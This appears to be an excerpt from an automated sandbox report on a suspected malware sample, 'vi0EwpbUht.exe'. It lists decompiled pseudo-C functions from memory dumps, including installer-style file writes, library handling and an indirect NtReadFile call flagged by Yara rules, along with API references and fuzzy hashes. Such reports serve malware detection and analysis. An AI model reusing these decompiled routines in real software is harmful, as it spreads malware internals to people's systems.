                                                                                                                          0x00000000
                                                                                                                          0x00404d6f
                                                                                                                          0x00404d09
                                                                                                                          0x00404d5c
                                                                                                                          0x00404d5c
                                                                                                                          0x00000000
                                                                                                                          0x00404d5c
                                                                                                                          0x00404d15
                                                                                                                          0x00404d17
                                                                                                                          0x00000000
                                                                                                                          0x00404d17
                                                                                                                          0x00404cdd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404ce4
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404D01
                                                                                                                          • CallWindowProcA.USER32 ref: 00404D6F
                                                                                                                            • Part of subcall function 00403DDB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403DED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                          • Instruction ID: 2250b5ae86c5db7695da18b81197a994f129f58ca555af08ca8730d1192fac1c
                                                                                                                          • Opcode Fuzzy Hash: 7ef91977e0255b1fc34b6530065b048aeb6426da5fc65d298478046c2303bded
                                                                                                                          • Instruction Fuzzy Hash: 5A118CB1600208BBDF217F629C4099B3B69EF84765F00813BFB14392A2C77C8951CFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029F6(0x11));
				} else {
					E004029D9(1);
					 *0x409f50 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405954(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nse728B.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                          0x004024be
                                                                                                                          0x004024be
                                                                                                                          0x004024c1
                                                                                                                          0x004024dc
                                                                                                                          0x004024c3
                                                                                                                          0x004024c5
                                                                                                                          0x004024ca
                                                                                                                          0x004024d1
                                                                                                                          0x004024e3
                                                                                                                          0x0040265c
                                                                                                                          0x0040265c
                                                                                                                          0x004024e9
                                                                                                                          0x004024fb
                                                                                                                          0x004015a6
                                                                                                                          0x004015a8
                                                                                                                          0x00000000
                                                                                                                          0x004015ae
                                                                                                                          0x004015a8
                                                                                                                          0x0040288e
                                                                                                                          0x0040289a

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll, xrefs: 004024CA, 004024EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWritelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll
                                                                                                                          • API String ID: 427699356-554494925
                                                                                                                          • Opcode ID: df474f2c717a3cfcee664a55503633412dfe168159680f8467c13f76ba73a4c8
                                                                                                                          • Instruction ID: 28baf68bc3b2ef7cd727d17ca875bc327529d04ff6cae4c8aacaeccaaba980a4
                                                                                                                          • Opcode Fuzzy Hash: df474f2c717a3cfcee664a55503633412dfe168159680f8467c13f76ba73a4c8
                                                                                                                          • Instruction Fuzzy Hash: 5AF0B4B2A04241FBDB40BBA09E49AAE37689B00348F10443BA206F51C2D6BC4982A76D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404E4D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 50%
                                                                                                                          			E00404E4D(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x423ea8; // 0x486a5c
				_t10 =  *0x423eac; // 0x1
				__imp__OleInitialize(0);
				 *0x423f38 =  *0x423f38 | __eax;
				E00403DDB(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x418;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x423f0c =  *0x423f0c + 1;
				}
				L7:
				E00403DDB(0x404);
				__imp__OleUninitialize();
				_t8 =  *0x423f0c; // 0x0
				return _t8;
			}








                                                                                                                          0x00404e4e
                                                                                                                          0x00404e55
                                                                                                                          0x00404e5d
                                                                                                                          0x00404e63
                                                                                                                          0x00404e6b
                                                                                                                          0x00404e72
                                                                                                                          0x00404e74
                                                                                                                          0x00404e77
                                                                                                                          0x00404e77
                                                                                                                          0x00404e7c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404e8d
                                                                                                                          0x00404e95
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404e97
                                                                                                                          0x00000000
                                                                                                                          0x00404e95
                                                                                                                          0x00404e99
                                                                                                                          0x00404e99
                                                                                                                          0x00404e9f
                                                                                                                          0x00404ea4
                                                                                                                          0x00404ea9
                                                                                                                          0x00404eaf
                                                                                                                          0x00404eb6

                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00404E5D
                                                                                                                            • Part of subcall function 00403DDB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403DED
                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 00404EA9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeMessageSendUninitialize
                                                                                                                          • String ID: \jH
                                                                                                                          • API String ID: 2896919175-2113029193
                                                                                                                          • Opcode ID: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                          • Instruction ID: dd00d1d9fa511fdb2abfd92f861b37bc179417f7df103cd37a6f8771cbc5aef0
                                                                                                                          • Opcode Fuzzy Hash: a71bf3315524e495bb63ac7db680478635d871b9932b013c5ee158b9648a44a1
                                                                                                                          • Instruction Fuzzy Hash: D3F0F0B2A00200AAD7201F64ED00B167BB4ABC0316F06003BFF04B62E0D3795802869D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403491, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403491() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f434;
				_t3 = E00403476(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f434 =  *0x41f434 & 0x00000000;
				return _t3;
			}







                                                                                                                          0x00403492
                                                                                                                          0x0040349a
                                                                                                                          0x004034a1
                                                                                                                          0x004034a4
                                                                                                                          0x004034a4
                                                                                                                          0x004034a6
                                                                                                                          0x004034ab
                                                                                                                          0x004034b2
                                                                                                                          0x004034b8
                                                                                                                          0x004034bc
                                                                                                                          0x004034bd
                                                                                                                          0x004034c5

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,00000000,00403469,004032BC,00000000), ref: 004034AB
                                                                                                                          • GlobalFree.KERNEL32 ref: 004034B2
                                                                                                                          Strings
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 004034A3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe"
                                                                                                                          • API String ID: 1100898210-2478495835
                                                                                                                          • Opcode ID: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                                                          • Instruction ID: 7bfc0464e02b508f879d35a29cae48101a6ab00b4f5f00e512934bdeb57274a8
                                                                                                                          • Opcode Fuzzy Hash: 3e2f1a94e1730b0e2f77525ddf4d06804517b8e77a23c02aa7cd98468957b701
                                                                                                                          • Instruction Fuzzy Hash: FBE08C3280653097C7221F05AE04B9AB66C6F94B22F068076E8407B3A1C3782C428AD8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405517, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405517(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                          0x00405518
                                                                                                                          0x00405522
                                                                                                                          0x00405524
                                                                                                                          0x0040552b
                                                                                                                          0x00405533
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405533
                                                                                                                          0x00405535
                                                                                                                          0x0040553a

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp\3582-490,00402C8E,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 0040551D
                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp\3582-490,00402C8E,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 0040552B
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\3582-490, xrefs: 00405517
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\3582-490
                                                                                                                          • API String ID: 2709904686-4085912586
                                                                                                                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                          • Instruction ID: 1341b21386aa9ee456471dc2eb10899dbff8c866770b3e7d35d8712ddbbc4649
                                                                                                                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                          • Instruction Fuzzy Hash: D9D0C7B2509DB06EE7035614DC04B9F7B89DF17710F1944A2E540A61D5D27C5D418BFD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100010D6, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E100010D6(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				 *0x10004060 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E, _t52);
				_t43 =  *0x10004058 +  *0x10004058 * 4 << 2;
				_t17 = E10001561();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E1000159E(E100015E5( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E1000160E( *_t55 - 0x30, E10001561());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001854(_t31 + 4,  *0x10004060, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001854( *0x10004060, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                          0x100010dd
                                                                                                                          0x100010e5
                                                                                                                          0x100010f9
                                                                                                                          0x10001101
                                                                                                                          0x1000110c
                                                                                                                          0x1000110f
                                                                                                                          0x10001117
                                                                                                                          0x1000111a
                                                                                                                          0x1000111c
                                                                                                                          0x100011ba
                                                                                                                          0x100011c6
                                                                                                                          0x10001122
                                                                                                                          0x10001123
                                                                                                                          0x10001123
                                                                                                                          0x10001126
                                                                                                                          0x10001127
                                                                                                                          0x1000112a
                                                                                                                          0x100011f9
                                                                                                                          0x100011fc
                                                                                                                          0x10001194
                                                                                                                          0x1000119a
                                                                                                                          0x100011a2
                                                                                                                          0x100011a7
                                                                                                                          0x100011aa
                                                                                                                          0x00000000
                                                                                                                          0x100011aa
                                                                                                                          0x100011ff
                                                                                                                          0x10001200
                                                                                                                          0x1000117c
                                                                                                                          0x10001182
                                                                                                                          0x1000118a
                                                                                                                          0x00000000
                                                                                                                          0x1000118a
                                                                                                                          0x10001148
                                                                                                                          0x10001149
                                                                                                                          0x10001151
                                                                                                                          0x1000115e
                                                                                                                          0x10001166
                                                                                                                          0x1000116f
                                                                                                                          0x10001174
                                                                                                                          0x10001174
                                                                                                                          0x00000000
                                                                                                                          0x10001149
                                                                                                                          0x10001130
                                                                                                                          0x100011c7
                                                                                                                          0x100011c7
                                                                                                                          0x100011ce
                                                                                                                          0x100011db
                                                                                                                          0x100011e0
                                                                                                                          0x100011e5
                                                                                                                          0x100011eb
                                                                                                                          0x100011f1
                                                                                                                          0x100011f1
                                                                                                                          0x00000000
                                                                                                                          0x100011ce
                                                                                                                          0x10001136
                                                                                                                          0x10001139
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1000113f
                                                                                                                          0x10001142
                                                                                                                          0x10001191
                                                                                                                          0x00000000
                                                                                                                          0x10001191
                                                                                                                          0x10001145
                                                                                                                          0x10001146
                                                                                                                          0x10001179
                                                                                                                          0x00000000
                                                                                                                          0x10001179
                                                                                                                          0x00000000
                                                                                                                          0x100011b0
                                                                                                                          0x100011b0
                                                                                                                          0x00000000
                                                                                                                          0x100011b9

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                            • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 10001151
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011AA
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011BD
                                                                                                                          • GlobalFree.KERNEL32 ref: 100011EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloclstrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 852173138-0
                                                                                                                          • Opcode ID: 63b0637edc7530645d46bec010932f639f2f746b6ed29226dfb72de0ebfb049a
                                                                                                                          • Instruction ID: ed341c900a7ce6bdf815d06216e218db22d2bbb6d3afa64795f6a6593979f754
                                                                                                                          • Opcode Fuzzy Hash: 63b0637edc7530645d46bec010932f639f2f746b6ed29226dfb72de0ebfb049a
                                                                                                                          • Instruction Fuzzy Hash: D031BCB5404655AFF705CF64DCC9BEA7FFCEB092D1B164029FA45D626CEB3099008B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405629, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405629(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                          0x00405635
                                                                                                                          0x00405637
                                                                                                                          0x0040565f
                                                                                                                          0x00405644
                                                                                                                          0x00405649
                                                                                                                          0x00405654
                                                                                                                          0x00000000
                                                                                                                          0x00405671
                                                                                                                          0x0040565d
                                                                                                                          0x0040565d
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405649
                                                                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405657
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                          • Instruction ID: 25fbcb832c33ec4964fd827efed06e6d871dcd69bbe6b28132c6debe6a032c6a
                                                                                                                          • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                                                          • Instruction Fuzzy Hash: 02F0A736249D51DBC2025B355C04E6FAA94EF92354B54097AF444F2251D33A98129BBF
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: vi0EwpbUht.exe PID: 6372 Parent PID: 6184 vi0EwpbUht.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00419FCB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 21%
                                                                                                                          			E00419FCB(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("cvtps2pd xmm2, [ecx+0x55]");
				_t13 = _a4;
				_t30 = _a4 + 0xc48;
				E0041AB20(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
				return _t18;
			}








                                                                                                                          0x00419fcd
                                                                                                                          0x00419fd3
                                                                                                                          0x00419fdf
                                                                                                                          0x00419fe7
                                                                                                                          0x00419ff2
                                                                                                                          0x0041a00d
                                                                                                                          0x0041a015
                                                                                                                          0x0041a019

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction ID: 104f8a14ad246c84b076e6c0995b0dbe01c20c6baf94378359c58f09699a7de8
                                                                                                                          • Opcode Fuzzy Hash: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction Fuzzy Hash: 98F0EC71204104ABDB04DF99DC51EDB77A9EF8C754F118249BE1D97241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419FD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                          0x00419fd3
                                                                                                                          0x00419fdf
                                                                                                                          0x00419fe7
                                                                                                                          0x00419ff2
                                                                                                                          0x0041a00d
                                                                                                                          0x0041a015
                                                                                                                          0x0041a019

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419F74, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                          Download Yara Rule
